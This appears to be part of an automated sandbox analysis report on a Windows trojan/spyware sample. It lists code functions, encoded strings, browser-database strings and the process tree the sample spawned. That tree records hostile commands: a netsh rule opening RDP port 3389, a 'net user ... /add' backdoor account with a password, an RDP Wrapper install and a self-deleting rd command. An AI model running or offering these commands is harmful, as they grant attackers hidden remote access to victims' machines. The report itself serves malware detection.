                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A2308_2_0044A230
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004012C78_2_004012C7
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004452E08_2_004452E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004153528_2_00415352
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004074508_2_00407450
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004054708_2_00405470
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004094028_2_00409402
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004404AB8_2_004404AB
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A5108_2_0044A510
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004115B08_2_004115B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041D6108_2_0041D610
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004496208_2_00449620
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040A6E08_2_0040A6E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040B6B08_2_0040B6B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043F7008_2_0043F700
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041E71A8_2_0041E71A
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044B7208_2_0044B720
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004288338_2_00428833
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004338C08_2_004338C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004408E68_2_004408E6
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004038A08_2_004038A0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004349908_2_00434990
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040ABA08_2_0040ABA0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042EBBC8_2_0042EBBC
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437CD08_2_00437CD0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449D228_2_00449D22
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407E508_2_00407E50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00427E6C8_2_00427E6C
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00437F308_2_00437F30
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042DFE08_2_0042DFE0
                                Source: C:\ProgramData\GIIIIJDHJE.exeCode function: 9_2_00DF0C409_2_00DF0C40
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC14CF011_2_1FC14CF0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC166C011_2_1FC166C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC0EA8011_2_1FC0EA80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC0F16011_2_1FC0F160
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC1900011_2_1FC19000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC3781011_2_1FC37810
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD916D011_2_1FD916D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD6A2C011_2_1FD6A2C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD861E011_2_1FD861E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD8FD5011_2_1FD8FD50
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD8D10011_2_1FD8D100
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD9392011_2_1FD93920
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD6F8D011_2_1FD6F8D0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD69CC011_2_1FD69CC0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD6943011_2_1FD69430
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDB4FB211_2_1FDB4FB2
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD95CCF11_2_1FD95CCF
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDF9F8011_2_1FDF9F80
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDDAEBE11_2_1FDDAEBE
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDF9A2011_2_1FDF9A20
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FDF939011_2_1FDF9390
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC9876011_2_1FC98760
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FCFE2E011_2_1FCFE2E0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FCA969011_2_1FCA9690
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC79A1011_2_1FC79A10
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FCF919011_2_1FCF9190
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC7497011_2_1FC74970
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC8812011_2_1FC88120
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD224C011_2_1FD224C0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FCF444011_2_1FCF4440
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC7300011_2_1FC73000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FD2803011_2_1FD28030
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1FC79C2011_2_1FC79C20
                                Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004047E8 appears 38 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410609 appears 71 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C11CBE8 appears 134 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C3109D0 appears 70 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CC80 appears 44 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041D1E0 appears 164 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C1294D0 appears 90 times
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004104E7 appears 36 times
                                Source: file.exeStatic PE information: invalid certificate
                                Source: file.exe, 00000000.00000002.1730999413.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                                Source: file.exeBinary or memory string: OriginalFilenameVQP.exeD vs file.exe
                                Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: IDBAFHDGDG.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 66f5dbaca34ac_lfdnsafnds[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: GIIIIJDHJE.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 66f5db9e54794_vfkagks[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: AFHDGDGIID.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: AFHDGDGIID.exe.2.dr, -Module-.csCryptographic APIs: 'TransformFinalBlock'
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, -Module-.csCryptographic APIs: 'TransformFinalBlock'
                                Source: AFHDGDGIID.exe.2.dr, UHJvZ3JhbUFB.csBase64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
                                Source: AFHDGDGIID.exe.2.dr, QXNzZW1ibHlMb2FkZXJB.csBase64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
                                Source: AFHDGDGIID.exe.2.dr, UkRQSW5zdGFsbGVyQUFB.csBase64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, UHJvZ3JhbUFB.csBase64 encoded string: 'inh5L7SGzRU7sj2gmVmtk/eCneBmUqRt8FtNyXoo+5AQmk3oRrY62g==', 'ZuGslAEpNHgbGP2/CVEjxfF+g/ySUEZ1sNXmGyrGai37Z7ophpxr5kYqIxrutvNDBCvvoQkvsCw='
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, QXNzZW1ibHlMb2FkZXJB.csBase64 encoded string: 'V3o82UX/MkW0zBr2uq1ofRWXUIfKv+li+lORUOdvw5oSTBJoZYRwd2qoeCeWckJwJoIDClvvsYSEx5KwDTmk2Q=='
                                Source: 66f5d9ab0d4c7_rdp[1].exe.2.dr, UkRQSW5zdGFsbGVyQUFB.csBase64 encoded string: 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'OEyWuG2XpnMfaLJJ1SjuQxay2W4PlIm7ErLccCa5YXYHOaAbp1WmYvs1TACbujnFRkwG3HeI99pmebsUyUcYxg==', 'mK/MvQHzOU0sxP54k5Qvx/lEMio9f2YK2UC9BwTiz8KREmr0zQ+O+A=='
                                Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@63/43@16/14
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C147030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C147030
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_004114A5
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,2_2_00411807
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP Wrapper
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
                                Source: C:\ProgramData\AFHDGDGIID.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:980:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1136:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                                Source: Yara matchFile source: 19.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 19.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.2487557862.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                                Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                                Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                Source: RegAsm.exe, 00000002.00000002.2575641703.000000006C31F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                                Source: GDAAKK.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                                Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2485834925.000000001F948000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                Source: RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                                Source: file.exeReversingLabs: Detection: 42%
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\IDBAFHDGDG.exe "C:\ProgramData\IDBAFHDGDG.exe"
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\IDBAFHDGDG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\GIIIIJDHJE.exe "C:\ProgramData\GIIIIJDHJE.exe"
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\ProgramData\GIIIIJDHJE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\AFHDGDGIID.exe "C:\ProgramData\AFHDGDGIID.exe"
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BFBKFHIDHIIJ" & exit
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                                Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                Source: C:\ProgramData\AFHDGDGIID.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_fec8106a DlRcmVQWc0I6 /add
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_fec8106a DlRcmVQWc0I6 /add
